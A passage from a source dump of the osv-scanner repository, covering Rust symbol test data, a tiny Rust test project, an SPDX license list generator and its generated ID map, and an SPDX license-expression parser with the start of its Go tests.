"std::sys::unix::locks::futex_rwlock::RwLock::spin_read::{{closure}}": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_until": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer_or_readers": {}, "std::sys::unix::locks::futex_rwlock::has_reached_max_readers": {}, "std::sys::unix::locks::futex_rwlock::is_read_lockable": {}, "std::sys::unix::locks::futex_rwlock::is_unlocked": {}, "std::sys::unix::memchr::memrchr": {}, "std::sys::unix::memchr::memrchr::memrchr_specific": {}, "std::sys::unix::os::current_exe": {}, "std::sys::unix::os::env_read_lock": {}, "std::sys::unix::os::errno": {}, "std::sys::unix::os::error_string": {}, "std::sys::unix::os::getcwd": {}, "std::sys::unix::os::getenv": {}, "std::sys::unix::os::page_size": {}, "std::sys::unix::os_str::Buf::push_slice": {}, "std::sys::unix::os_str::Buf::with_capacity": {}, "std::sys::unix::os_str::Slice::fmt": {}, "std::sys::unix::os_str::Slice::to_owned": {}, "std::sys::unix::os_str::Slice::to_str": {}, "std::sys::unix::path::is_sep_byte": {}, "std::sys::unix::stack_overflow::imp::cleanup": {}, "std::sys::unix::stack_overflow::imp::drop_handler": {}, "std::sys::unix::stack_overflow::imp::signal_handler": {}, "std::sys::unix::stdio::Stderr::write": {}, "std::sys::unix::stdio::Stdout::write": {}, "std::sys::unix::stdio::is_ebadf": {}, "std::sys::unix::thread_local_dtor::register_dtor": {}, "std::sys::unix::thread_local_key::create": {}, "std::sys::unix::thread_local_key::destroy": {}, "std::sys::unix::thread_local_key::get": {}, "std::sys::unix::thread_local_key::set": {}, "std::sys::unix::time::SystemTime::sub_time": {}, "std::sys::unix::time::Timespec::checked_add_duration": {}, "std::sys::unix::time::Timespec::partial_cmp": {}, "std::sys::unix::time::Timespec::sub_timespec": {}, "std::sys::unix::time::Timespec::to_timespec": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::SystemTime\u003e::now": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::Timespec\u003e::now": {}, "std::sys_common::backtrace::_print::DisplayBacktrace::fmt": {}, "std::sys_common::backtrace::_rust_begin_short_backtrace": {}, "std::sys_common::backtrace::_rust_end_short_backtrace": {}, "std::sys_common::backtrace::lock": {}, "std::sys_common::backtrace::output_filename": {}, "std::sys_common::backtrace::print": {}, "std::sys_common::backtrace::print_fmt": {}, "std::sys_common::backtrace::print_fmt::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}::{{closure}}": {}, "std::sys_common::memchr::memrchr": {}, "std::sys_common::mutex::MovableMutex::raw_lock": {}, "std::sys_common::mutex::MovableMutex::raw_unlock": {}, "std::sys_common::mutex::MovableMutex::try_lock": {}, "std::sys_common::mutex::StaticMutex::lock": {}, "std::sys_common::mutex::StaticMutexGuard::drop": {}, "std::sys_common::remutex::ReentrantMutex::increment_lock_count": {}, "std::sys_common::remutex::ReentrantMutex::lock": {}, "std::sys_common::remutex::ReentrantMutex::try_lock": {}, "std::sys_common::remutex::ReentrantMutexGuard::drop": {}, "std::sys_common::rwlock::StaticRwLock::read": {}, "std::sys_common::rwlock::StaticRwLockReadGuard::drop": {}, "std::sys_common::thread_info::THREAD_INFO::_getit": {}, "std::sys_common::thread_info::THREAD_INFO::_getit::destroy": {}, "std::sys_common::thread_info::ThreadInfo::with": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}::{{closure}}": {}, "std::sys_common::thread_info::current_thread": {}, "std::sys_common::thread_info::current_thread::{{closure}}": {}, "std::sys_common::thread_info::stack_guard": {}, "std::sys_common::thread_info::stack_guard::{{closure}}": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback::run_dtors": {}, "std::sys_common::thread_local_key::StaticKey::get": {}, "std::sys_common::thread_local_key::StaticKey::key": {}, "std::sys_common::thread_local_key::StaticKey::lazy_init": {}, "std::sys_common::thread_local_key::StaticKey::set": {}, "std::sys_common::thread_parker::futex::Parker::new": {}, "std::sys_common::thread_parker::futex::Parker::park": {}, "std::sys_common::thread_parker::futex::Parker::unpark": {}, "std::thread::Thread::clone": {}, "std::thread::Thread::cname": {}, "std::thread::Thread::name": {}, "std::thread::Thread::new": {}, "std::thread::Thread::unpark": {}, "std::thread::ThreadId::new": {}, "std::thread::ThreadId::new::exhausted": {}, "std::thread::current": {}, "std::thread::local::AccessError::fmt": {}, "std::thread::local::LocalKey::try_with": {}, "std::thread::local::LocalKey::with": {}, "std::thread::local::fast::Key::register_dtor": {}, "std::thread::park": {}, "std::time::SystemTime::duration_since": {}, "std::time::SystemTime::elapsed": {}, "std::time::SystemTime::now": {}, "str::fmt": {}, "test_rust_2::C::test_aabbee": {}, "test_rust_2::main": {}, "test_rust_2::other_item_123": {}, "u16::div": {}, "u16::forward_unchecked": {}, "u16::to_u64": {}, "u16::to_u8": {}, "u32::add": {}, "u32::checked_add": {}, "u32::checked_mul": {}, "u32::div": {}, "u32::shl": {}, "u32::to_u64": {}, "u32::to_u8": {}, "u64::add": {}, "u64::checked_add": {}, "u64::checked_mul": {}, "u64::div": {}, "u64::forward_unchecked": {}, "u64::from_u32": {}, "u64::mul": {}, "u64::to_u64": {}, "u64::to_u8": {}, "u8::bitand": {}, "u8::div": {}, "u8::from_elem": {}, "u8::rem": {}, "u8::to_u64": {}, "usize::add": {}, "usize::add_assign": {}, "usize::backward_unchecked": {}, "usize::div": {}, "usize::forward_unchecked": {}, "usize::from_u64": {}, "usize::from_u8": {}, "usize::get": {}, "usize::get_unchecked": {}, "usize::get_unchecked_mut": {}, "usize::index": {}, "usize::index_mut": {}, "usize::sub": {}, "usize::sum": {}, "usize::sum::{{closure}}": {}, "usize::to_u8": {} } ================================================ FILE: internal/sourceanalysis/testdata/rust/rust-project/.gitignore ================================================ target/ ================================================ FILE: internal/sourceanalysis/testdata/rust/rust-project/Cargo.toml ================================================ [package] name = "test-project" version = "0.1.0" edition = "2021" # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [dependencies] # smallvec = "=0.6.13" ================================================ FILE: internal/sourceanalysis/testdata/rust/rust-project/src/main.rs ================================================ fn main() { println!("Hello, world!"); test_func(); } fn test_func() { println!("test func") } ================================================ FILE: internal/sourceanalysis/testmain_test.go ================================================ package sourceanalysis_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/spdx/gen.go ================================================ //go:build generate //go:generate go run gen.go package main import ( "encoding/json" "fmt" "go/format" "io/ioutil" "net/http" "strings" ) type License struct { SPDXID string `json:"licenseId"` } func main() { resp, err := http.Get("https://raw.githubusercontent.com/spdx/license-list-data/main/json/licenses.json") if err != nil { panic(err) } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil { panic(err) } var licenseList struct { Licenses []License `json:"licenses"` } err = json.Unmarshal(body, &licenseList) if err != nil { panic(err) } output := "// Code generated by gen.go. DO NOT EDIT.\n\n package spdx\nvar IDs = map[string]bool{\n" for _, license := range licenseList.Licenses { output += fmt.Sprintf("%q: true,\n", strings.ToLower(license.SPDXID)) } output += "}" formatted, err := format.Source([]byte(output)) if err != nil { panic(err) } err = ioutil.WriteFile("licenses.go", formatted, 0644) if err != nil { panic(err) } } ================================================ FILE: internal/spdx/licenses.go ================================================ // Code generated by gen.go. DO NOT EDIT. package spdx var IDs = map[string]bool{ "0bsd": true, "3d-slicer-1.0": true, "aal": true, "abstyles": true, "adacore-doc": true, "adobe-2006": true, "adobe-display-postscript": true, "adobe-glyph": true, "adobe-utopia": true, "adsl": true, "advanced-cryptics-dictionary": true, "afl-1.1": true, "afl-1.2": true, "afl-2.0": true, "afl-2.1": true, "afl-3.0": true, "afmparse": true, "agpl-1.0": true, "agpl-1.0-only": true, "agpl-1.0-or-later": true, "agpl-3.0": true, "agpl-3.0-only": true, "agpl-3.0-or-later": true, "aladdin": true, "alglib-documentation": true, "amd-newlib": true, "amdplpa": true, "aml": true, "aml-glslang": true, "ampas": true, "antlr-pd": true, "antlr-pd-fallback": true, "any-osi": true, "any-osi-perl-modules": true, "apache-1.0": true, "apache-1.1": true, "apache-2.0": true, "apafml": true, "apl-1.0": true, "app-s2p": true, "apsl-1.0": true, "apsl-1.1": true, "apsl-1.2": true, "apsl-2.0": true, "arphic-1999": true, "artistic-1.0": true, "artistic-1.0-cl8": true, "artistic-1.0-perl": true, "artistic-2.0": true, "artistic-dist": true, "aspell-ru": true, "aswf-digital-assets-1.0": true, "aswf-digital-assets-1.1": true, "baekmuk": true, "bahyph": true, "barr": true, "bcrypt-solar-designer": true, "beerware": true, "bitstream-charter": true, "bitstream-vera": true, "bittorrent-1.0": true, "bittorrent-1.1": true, "blessing": true, "blueoak-1.0.0": true, "boehm-gc": true, "boehm-gc-without-fee": true, "bola-1.1": true, "borceux": true, "brian-gladman-2-clause": true, "brian-gladman-3-clause": true, "bsd-1-clause": true, "bsd-2-clause": true, "bsd-2-clause-darwin": true, "bsd-2-clause-first-lines": true, "bsd-2-clause-freebsd": true, "bsd-2-clause-netbsd": true, "bsd-2-clause-patent": true, "bsd-2-clause-pkgconf-disclaimer": true, "bsd-2-clause-views": true, "bsd-3-clause": true, "bsd-3-clause-acpica": true, "bsd-3-clause-attribution": true, "bsd-3-clause-clear": true, "bsd-3-clause-flex": true, "bsd-3-clause-hp": true, "bsd-3-clause-lbnl": true, "bsd-3-clause-modification": true, "bsd-3-clause-no-military-license": true, "bsd-3-clause-no-nuclear-license": true, "bsd-3-clause-no-nuclear-license-2014": true, "bsd-3-clause-no-nuclear-warranty": true, "bsd-3-clause-open-mpi": true, "bsd-3-clause-sun": true, "bsd-3-clause-tso": true, "bsd-4-clause": true, "bsd-4-clause-shortened": true, "bsd-4-clause-uc": true, "bsd-4.3reno": true, "bsd-4.3tahoe": true, "bsd-advertising-acknowledgement": true, "bsd-attribution-hpnd-disclaimer": true, "bsd-inferno-nettverk": true, "bsd-mark-modifications": true, "bsd-protection": true, "bsd-source-beginning-file": true, "bsd-source-code": true, "bsd-systemics": true, "bsd-systemics-w3works": true, "bsl-1.0": true, "buddy": true, "busl-1.1": true, "bzip2-1.0.5": true, "bzip2-1.0.6": true, "c-uda-1.0": true, "cal-1.0": true, "cal-1.0-combined-work-exception": true, "caldera": true, "caldera-no-preamble": true, "capec-tou": true, "catharon": true, "catosl-1.1": true, "cc-by-1.0": true, "cc-by-2.0": true, "cc-by-2.5": true, "cc-by-2.5-au": true, "cc-by-3.0": true, "cc-by-3.0-at": true, "cc-by-3.0-au": true, "cc-by-3.0-de": true, "cc-by-3.0-igo": true, "cc-by-3.0-nl": true, "cc-by-3.0-us": true, "cc-by-4.0": true, "cc-by-nc-1.0": true, "cc-by-nc-2.0": true, "cc-by-nc-2.5": true, "cc-by-nc-3.0": true, "cc-by-nc-3.0-de": true, "cc-by-nc-4.0": true, "cc-by-nc-nd-1.0": true, "cc-by-nc-nd-2.0": true, "cc-by-nc-nd-2.5": true, "cc-by-nc-nd-3.0": true, "cc-by-nc-nd-3.0-de": true, "cc-by-nc-nd-3.0-igo": true, "cc-by-nc-nd-4.0": true, "cc-by-nc-sa-1.0": true, "cc-by-nc-sa-2.0": true, "cc-by-nc-sa-2.0-de": true, "cc-by-nc-sa-2.0-fr": true, "cc-by-nc-sa-2.0-uk": true, "cc-by-nc-sa-2.5": true, "cc-by-nc-sa-3.0": true, "cc-by-nc-sa-3.0-de": true, "cc-by-nc-sa-3.0-igo": true, "cc-by-nc-sa-4.0": true, "cc-by-nd-1.0": true, "cc-by-nd-2.0": true, "cc-by-nd-2.5": true, "cc-by-nd-3.0": true, "cc-by-nd-3.0-de": true, "cc-by-nd-4.0": true, "cc-by-sa-1.0": true, "cc-by-sa-2.0": true, "cc-by-sa-2.0-uk": true, "cc-by-sa-2.1-jp": true, "cc-by-sa-2.5": true, "cc-by-sa-3.0": true, "cc-by-sa-3.0-at": true, "cc-by-sa-3.0-de": true, "cc-by-sa-3.0-igo": true, "cc-by-sa-4.0": true, "cc-pddc": true, "cc-pdm-1.0": true, "cc-sa-1.0": true, "cc0-1.0": true, "cddl-1.0": true, "cddl-1.1": true, "cdl-1.0": true, "cdla-permissive-1.0": true, "cdla-permissive-2.0": true, "cdla-sharing-1.0": true, "cecill-1.0": true, "cecill-1.1": true, "cecill-2.0": true, "cecill-2.1": true, "cecill-b": true, "cecill-c": true, "cern-ohl-1.1": true, "cern-ohl-1.2": true, "cern-ohl-p-2.0": true, "cern-ohl-s-2.0": true, "cern-ohl-w-2.0": true, "cfitsio": true, "check-cvs": true, "checkmk": true, "clartistic": true, "clips": true, "cmu-mach": true, "cmu-mach-nodoc": true, "cnri-jython": true, "cnri-python": true, "cnri-python-gpl-compatible": true, "coil-1.0": true, "community-spec-1.0": true, "condor-1.1": true, "copyleft-next-0.3.0": true, "copyleft-next-0.3.1": true, "cornell-lossless-jpeg": true, "cpal-1.0": true, "cpl-1.0": true, "cpol-1.02": true, "cronyx": true, "crossword": true, "cryptoswift": true, "crystalstacker": true, "cua-opl-1.0": true, "cube": true, "curl": true, "cve-tou": true, "d-fsl-1.0": true, "dec-3-clause": true, "diffmark": true, "dl-de-by-2.0": true, "dl-de-zero-2.0": true, "doc": true, "docbook-dtd": true, "docbook-schema": true, "docbook-stylesheet": true, "docbook-xml": true, "dotseqn": true, "drl-1.0": true, "drl-1.1": true, "dsdp": true, "dtoa": true, "dvipdfm": true, "ecl-1.0": true, "ecl-2.0": true, "ecos-2.0": true, "efl-1.0": true, "efl-2.0": true, "egenix": true, "elastic-2.0": true, "entessa": true, "epics": true, "epl-1.0": true, "epl-2.0": true, "erlpl-1.1": true, "esa-pl-permissive-2.4": true, "esa-pl-strong-copyleft-2.4": true, "esa-pl-weak-copyleft-2.4": true, "etalab-2.0": true, "eudatagrid": true, "eupl-1.0": true, "eupl-1.1": true, "eupl-1.2": true, "eurosym": true, "fair": true, "fbm": true, "fdk-aac": true, "ferguson-twofish": true, "frameworx-1.0": true, "freebsd-doc": true, "freeimage": true, "fsfap": true, "fsfap-no-warranty-disclaimer": true, "fsful": true, "fsfullr": true, "fsfullrsd": true, "fsfullrwd": true, "fsl-1.1-alv2": true, "fsl-1.1-mit": true, "ftl": true, "furuseth": true, "fwlw": true, "game-programming-gems": true, "gcr-docs": true, "gd": true, "generic-xts": true, "gfdl-1.1": true, "gfdl-1.1-invariants-only": true, "gfdl-1.1-invariants-or-later": true, "gfdl-1.1-no-invariants-only": true, "gfdl-1.1-no-invariants-or-later": true, "gfdl-1.1-only": true, "gfdl-1.1-or-later": true, "gfdl-1.2": true, "gfdl-1.2-invariants-only": true, "gfdl-1.2-invariants-or-later": true, "gfdl-1.2-no-invariants-only": true, "gfdl-1.2-no-invariants-or-later": true, "gfdl-1.2-only": true, "gfdl-1.2-or-later": true, "gfdl-1.3": true, "gfdl-1.3-invariants-only": true, "gfdl-1.3-invariants-or-later": true, "gfdl-1.3-no-invariants-only": true, "gfdl-1.3-no-invariants-or-later": true, "gfdl-1.3-only": true, "gfdl-1.3-or-later": true, "giftware": true, "gl2ps": true, "glide": true, "glulxe": true, "glwtpl": true, "gnuplot": true, "gpl-1.0": true, "gpl-1.0+": true, "gpl-1.0-only": true, "gpl-1.0-or-later": true, "gpl-2.0": true, "gpl-2.0+": true, "gpl-2.0-only": true, "gpl-2.0-or-later": true, "gpl-2.0-with-autoconf-exception": true, "gpl-2.0-with-bison-exception": true, "gpl-2.0-with-classpath-exception": true, "gpl-2.0-with-font-exception": true, "gpl-2.0-with-gcc-exception": true, "gpl-3.0": true, "gpl-3.0+": true, "gpl-3.0-only": true, "gpl-3.0-or-later": true, "gpl-3.0-with-autoconf-exception": true, "gpl-3.0-with-gcc-exception": true, "graphics-gems": true, "gsoap-1.3b": true, "gtkbook": true, "gutmann": true, "haskellreport": true, "hdf5": true, "hdparm": true, "hidapi": true, "hippocratic-2.1": true, "hp-1986": true, "hp-1989": true, "hpnd": true, "hpnd-dec": true, "hpnd-doc": true, "hpnd-doc-sell": true, "hpnd-export-us": true, "hpnd-export-us-acknowledgement": true, "hpnd-export-us-modify": true, "hpnd-export2-us": true, "hpnd-fenneberg-livingston": true, "hpnd-inria-imag": true, "hpnd-intel": true, "hpnd-kevlin-henney": true, "hpnd-markus-kuhn": true, "hpnd-merchantability-variant": true, "hpnd-mit-disclaimer": true, "hpnd-netrek": true, "hpnd-pbmplus": true, "hpnd-sell-mit-disclaimer-xserver": true, "hpnd-sell-regexpr": true, "hpnd-sell-variant": true, "hpnd-sell-variant-critical-systems": true, "hpnd-sell-variant-mit-disclaimer": true, "hpnd-sell-variant-mit-disclaimer-rev": true, "hpnd-smc": true, "hpnd-uc": true, "hpnd-uc-export-us": true, "htmltidy": true, "hyphen-bulgarian": true, "ibm-pibs": true, "icu": true, "iec-code-components-eula": true, "ijg": true, "ijg-short": true, "imagemagick": true, "imatix": true, "imlib2": true, "info-zip": true, "inner-net-2.0": true, "innosetup": true, "intel": true, "intel-acpi": true, "interbase-1.0": true, "ipa": true, "ipl-1.0": true, "isc": true, "isc-veillard": true, "iso-permission": true, "jam": true, "jasper-2.0": true, "jove": true, "jpl-image": true, "jpnic": true, "json": true, "kastrup": true, "kazlib": true, "knuth-ctan": true, "lal-1.2": true, "lal-1.3": true, "latex2e": true, "latex2e-translated-notice": true, "leptonica": true, "lgpl-2.0": true, "lgpl-2.0+": true, "lgpl-2.0-only": true, "lgpl-2.0-or-later": true, "lgpl-2.1": true, "lgpl-2.1+": true, "lgpl-2.1-only": true, "lgpl-2.1-or-later": true, "lgpl-3.0": true, "lgpl-3.0+": true, "lgpl-3.0-only": true, "lgpl-3.0-or-later": true, "lgpllr": true, "libpng": true, "libpng-1.6.35": true, "libpng-2.0": true, "libselinux-1.0": true, "libtiff": true, "libutil-david-nugent": true, "liliq-p-1.1": true, "liliq-r-1.1": true, "liliq-rplus-1.1": true, "linux-man-pages-1-para": true, "linux-man-pages-copyleft": true, "linux-man-pages-copyleft-2-para": true, "linux-man-pages-copyleft-var": true, "linux-openib": true, "loop": true, "lpd-document": true, "lpl-1.0": true, "lpl-1.02": true, "lppl-1.0": true, "lppl-1.1": true, "lppl-1.2": true, "lppl-1.3a": true, "lppl-1.3c": true, "lsof": true, "lucida-bitmap-fonts": true, "lzma-sdk-9.11-to-9.20": true, "lzma-sdk-9.22": true, "mackerras-3-clause": true, "mackerras-3-clause-acknowledgment": true, "magaz": true, "mailprio": true, "makeindex": true, "man2html": true, "martin-birgmeier": true, "mcphee-slideshow": true, "metamail": true, "minpack": true, "mips": true, "miros": true, "mit": true, "mit-0": true, "mit-advertising": true, "mit-click": true, "mit-cmu": true, "mit-enna": true, "mit-feh": true, "mit-festival": true, "mit-khronos-old": true, "mit-modern-variant": true, "mit-open-group": true, "mit-stk": true, "mit-testregex": true, "mit-wu": true, "mitnfa": true, "mmixware": true, "mmpl-1.0.1": true, "motosoto": true, "mpeg-ssg": true, "mpi-permissive": true, "mpich2": true, "mpl-1.0": true, "mpl-1.1": true, "mpl-2.0": true, "mpl-2.0-no-copyleft-exception": true, "mplus": true, "ms-lpl": true, "ms-pl": true, "ms-rl": true, "mtll": true, "mulanpsl-1.0": true, "mulanpsl-2.0": true, "multics": true, "mup": true, "naist-2003": true, "nasa-1.3": true, "naumen": true, "nbpl-1.0": true, "ncbi-pd": true, "ncgl-uk-2.0": true, "ncl": true, "ncsa": true, "net-snmp": true, "netcdf": true, "newsletr": true, "ngpl": true, "ngrep": true, "nicta-1.0": true, "nist-pd": true, "nist-pd-fallback": true, "nist-pd-tnt": true, "nist-software": true, "nlod-1.0": true, "nlod-2.0": true, "nlpl": true, "nokia": true, "nosl": true, "noweb": true, "npl-1.0": true, "npl-1.1": true, "nposl-3.0": true, "nrl": true, "ntia-pd": true, "ntp": true, "ntp-0": true, "nunit": true, "o-uda-1.0": true, "oar": true, "occt-pl": true, "oclc-2.0": true, "odbl-1.0": true, "odc-by-1.0": true, "offis": true, "ofl-1.0": true, "ofl-1.0-no-rfn": true, "ofl-1.0-rfn": true, "ofl-1.1": true, "ofl-1.1-no-rfn": true, "ofl-1.1-rfn": true, "ogc-1.0": true, "ogdl-taiwan-1.0": true, "ogl-canada-2.0": true, "ogl-uk-1.0": true, "ogl-uk-2.0": true, "ogl-uk-3.0": true, "ogtsl": true, "oldap-1.1": true, "oldap-1.2": true, "oldap-1.3": true, "oldap-1.4": true, "oldap-2.0": true, "oldap-2.0.1": true, "oldap-2.1": true, "oldap-2.2": true, "oldap-2.2.1": true, "oldap-2.2.2": true, "oldap-2.3": true, "oldap-2.4": true, "oldap-2.5": true, "oldap-2.6": true, "oldap-2.7": true, "oldap-2.8": true, "olfl-1.3": true, "oml": true, "openmdw-1.0": true, "openpbs-2.3": true, "openssl": true, "openssl-standalone": true, "openvision": true, "opl-1.0": true, "opl-uk-3.0": true, "opubl-1.0": true, "osc-1.0": true, "oset-pl-2.1": true, "osl-1.0": true, "osl-1.1": true, "osl-2.0": true, "osl-2.1": true, "osl-3.0": true, "ossp": true, "padl": true, "paratype-free-font-1.3": true, "parity-6.0.0": true, "parity-7.0.0": true, "pddl-1.0": true, "php-3.0": true, "php-3.01": true, "pixar": true, "pkgconf": true, "plexus": true, "pnmstitch": true, "polyform-noncommercial-1.0.0": true, "polyform-small-business-1.0.0": true, "postgresql": true, "ppl": true, "psf-2.0": true, "psfrag": true, "psutils": true, "python-2.0": true, "python-2.0.1": true, "python-ldap": true, "qhull": true, "qpl-1.0": true, "qpl-1.0-inria-2004": true, "radvd": true, "rdisc": true, "rhecos-1.1": true, "rpl-1.1": true, "rpl-1.5": true, "rpsl-1.0": true, "rsa-md": true, "rscpl": true, "ruby": true, "ruby-pty": true, "sax-pd": true, "sax-pd-2.0": true, "saxpath": true, "scea": true, "schemereport": true, "sendmail": true, "sendmail-8.23": true, "sendmail-open-source-1.1": true, "sgi-b-1.0": true, "sgi-b-1.1": true, "sgi-b-2.0": true, "sgi-opengl": true, "sgmlug-pm": true, "sgp4": true, "shl-0.5": true, "shl-0.51": true, "simpl-2.0": true, "sissl": true, "sissl-1.2": true, "sl": true, "sleepycat": true, "smail-gpl": true, "smlnj": true, "smppl": true, "snia": true, "snprintf": true, "sofa": true, "softsurfer": true, "soundex": true, "spencer-86": true, "spencer-94": true, "spencer-99": true, "spl-1.0": true, "ssh-keyscan": true, "ssh-openssh": true, "ssh-short": true, "ssleay-standalone": true, "sspl-1.0": true, "standardml-nj": true, "sugarcrm-1.1.3": true, "sul-1.0": true, "sun-ppp": true, "sun-ppp-2000": true, "sunpro": true, "swl": true, "swrule": true, "symlinks": true, "tapr-ohl-1.0": true, "tcl": true, "tcp-wrappers": true, "tekhvc": true, "termreadkey": true, "tgppl-1.0": true, "thirdeye": true, "threeparttable": true, "tmate": true, "torque-1.1": true, "tosl": true, "tpdl": true, "tpl-1.0": true, "trustedqsl": true, "ttwl": true, "ttyp0": true, "tu-berlin-1.0": true, "tu-berlin-2.0": true, "ubuntu-font-1.0": true, "ucar": true, "ucl-1.0": true, "ulem": true, "umich-merit": true, "unicode-3.0": true, "unicode-dfs-2015": true, "unicode-dfs-2016": true, "unicode-tou": true, "unixcrypt": true, "unlicense": true, "unlicense-libtelnet": true, "unlicense-libwhirlpool": true, "unrar": true, "upl-1.0": true, "urt-rle": true, "vim": true, "vixie-cron": true, "vostrom": true, "vsl-1.0": true, "w3c": true, "w3c-19980720": true, "w3c-20150513": true, "w3m": true, "watcom-1.0": true, "widget-workshop": true, "wordnet": true, "wsuipa": true, "wtfnmfpl": true, "wtfpl": true, "wwl": true, "wxwindows": true, "x11": true, "x11-distribute-modifications-variant": true, "x11-no-permit-persons": true, "x11-swapped": true, "xdebug-1.03": true, "xerox": true, "xfig": true, "xfree86-1.1": true, "xinetd": true, "xkeyboard-config-zinoviev": true, "xlock": true, "xnet": true, "xpp": true, "xskat": true, "xzoom": true, "ypl-1.0": true, "ypl-1.1": true, "zed": true, "zeeff": true, "zend-2.0": true, "zimbra-1.3": true, "zimbra-1.4": true, "zlib": true, "zlib-acknowledgement": true, "zpl-1.1": true, "zpl-2.0": true, "zpl-2.1": true, } ================================================ FILE: internal/spdx/satisfies.go ================================================ // Package spdx provides functionality for parsing and evaluating SPDX license expressions. package spdx import ( "errors" "fmt" "slices" "strings" "github.com/google/osv-scanner/v2/pkg/models" ) type node interface { // satisfiedBy checks if the given licenses satisfy the license expression represented by this node satisfiedBy(licenses []string) bool } // nodeBranch represents a node in the tree that has two children, which should be // evaluated with the operator to determine if the license expression is satisfied type nodeBranch struct { left node operator string right node } func (n nodeBranch) satisfiedBy(licenses []string) bool { switch n.operator { case "AND": return n.left.satisfiedBy(licenses) && n.right.satisfiedBy(licenses) case "OR": return n.left.satisfiedBy(licenses) || n.right.satisfiedBy(licenses) } return false } var _ node = nodeBranch{} // nodeLeaf represents a leaf node in the tree, which holds a single license id type nodeLeaf struct { value string } func (n nodeLeaf) satisfiedBy(licenses []string) bool { v := strings.ToLower(n.value) for _, l := range licenses { if v == strings.ToLower(l) { return true } } return false } var _ node = nodeLeaf{} type tokens struct { tokens []string } // peek returns the next token in the list of tokens, or otherwise an empty string func (ts *tokens) peek() string { if len(ts.tokens) == 0 { return "" } return ts.tokens[0] } // next returns the next token in the list of tokens, removing it from the list in the process func (ts *tokens) next() string { token := ts.tokens[0] ts.tokens = ts.tokens[1:] return token } // allowed represents the tokens that are allowed to come after a particular token var allowed = map[string][]string{ "WITH": {"EXP"}, "AND": {"EXP", "("}, "OR": {"EXP", "("}, "(": {"EXP", "("}, ")": {")", "AND", "OR", "END"}, "EXP": {"WITH", "AND", "OR", ")", "END"}, "END": {}, } // nextAndIsNextNextValid returns both the next token, and checks if the token after that one is valid func (ts *tokens) nextAndIsNextNextValid() (string, error) { next := ts.next() return next, ts.isNextValid(next) } // isNextValid checks if the next token is valid to come after the given the current token func (ts *tokens) isNextValid(cur string) error { allowedNext := allowed[cur] // license expressions are implied as being not one of the other tokens if allowedNext == nil { cur = "EXP" allowedNext = allowed[cur] } next := "END" if len(ts.tokens) > 0 { next = ts.peek() } // license expressions are implied as being not one of the other tokens if _, ok := allowed[next]; !ok { next = "EXP" } if slices.Contains(allowedNext, next) { return nil } return fmt.Errorf("unexpected %s after %s", next, cur) } // tokenise breaks down the given spdx license expression into tokens func tokenise(license models.License) tokens { var ts tokens current := "" for _, c := range string(license) { switch c { case '(', ')', ' ': // check if we've been accumulating a token, before processing the current character if current != "" { ts.tokens = append(ts.tokens, current) } current = "" // spaces are only used to separate tokens, but are not tokens themselves if c != ' ' { ts.tokens = append(ts.tokens, string(c)) } default: current += string(c) } } // before returning, make sure we add the last token we were accumulating if current != "" { ts.tokens = append(ts.tokens, current) } return ts } // parse constructs an ast tree from the given tokens func parse(tokens *tokens) (node, error) { return parseOr(tokens) } func parseOr(tokens *tokens) (node, error) { left, err := parseAnd(tokens) if err != nil { return nil, err } for tokens.peek() == "OR" { operator, err := tokens.nextAndIsNextNextValid() if err != nil { return nil, err } right, err := parseAnd(tokens) if err != nil { return nil, err } left = nodeBranch{ left: left, operator: operator, right: right, } } return left, nil } func parseAnd(tokens *tokens) (node, error) { left, err := parseExpression(tokens) if err != nil { return nil, err } for tokens.peek() == "AND" { operator, err := tokens.nextAndIsNextNextValid() if err != nil { return nil, err } right, err := parseExpression(tokens) if err != nil { return nil, err } left = nodeBranch{ left: left, operator: operator, right: right, } } return left, nil } func parseExpression(tokens *tokens) (node, error) { next, err := tokens.nextAndIsNextNextValid() if err != nil { return nil, err } if next == "(" { expr, err := parseOr(tokens) if err != nil { return nil, err } if tokens.peek() != ")" { return nil, errors.New("missing closing bracket") } _, err = tokens.nextAndIsNextNextValid() if err != nil { return nil, err } return expr, nil } // currently WITH expressions are just treated as part of the license if tokens.peek() == "WITH" { nex2, err := tokens.nextAndIsNextNextValid() if err != nil { return nil, err } next += " " + nex2 + " " + tokens.next() } return nodeLeaf{value: next}, nil } // Satisfies checks if the given license expression is satisfied by the allowed licenses func Satisfies(license models.License, allowlist []string) (bool, error) { tokens := tokenise(license) nod, err := parse(&tokens) if err != nil { return false, err } return nod.satisfiedBy(allowlist), nil } ================================================ FILE: internal/spdx/satisfies_test.go ================================================ package spdx_test import ( "strings" "testing" "github.com/google/osv-scanner/v2/internal/spdx" "github.com/google/osv-scanner/v2/pkg/models" ) func namer(t *testing.T, license models.License, licenses []string, expected bool) string { t.Helper() name := string(license) + " is" if !expected { name += " not" } return name + " satisfied by " + strings.Join(licenses, ", ") } func TestSatisfies(t *testing.T) { t.Parallel() tests := []struct { license models.License pass [][]string fail [][]string }{ // simple { license: "MIT", pass: [][]string{{"MIT"}, {"MIT", "Apache-2.0"}}, fail: [][]string{{"Apache-2.0"}}, }, { license: "Apache-2.0", pass: [][]string{{"Apache-2.0"}, {"MIT", "Apache-2.0"}}, fail: [][]string{{"MIT"}}, }, // WITH expressions (ignored) { license: "GPL-2.0-or-later WITH Bison-exception-2.2", pass: [][]string{ {"GPL-2.0-or-later WITH Bison-exception-2.2"}, }, fail: [][]string{ {"Bison-exception-2.2"}, {"GPL-2.0-or-later"}, {"GPL-2.0-or-later", "Bison-exception-2.2"}, {"GPL-1.0"}, }, }, // OR expressions { license: "MIT OR Apache-2.0", pass: [][]string{ {"MIT"}, {"Apache-2.0"}, {"Apache-2.0", "MIT"}, {"Apache-1.0", "MIT"}, }, fail: [][]string{ {"Apache-1.0"}, }, }, { license: 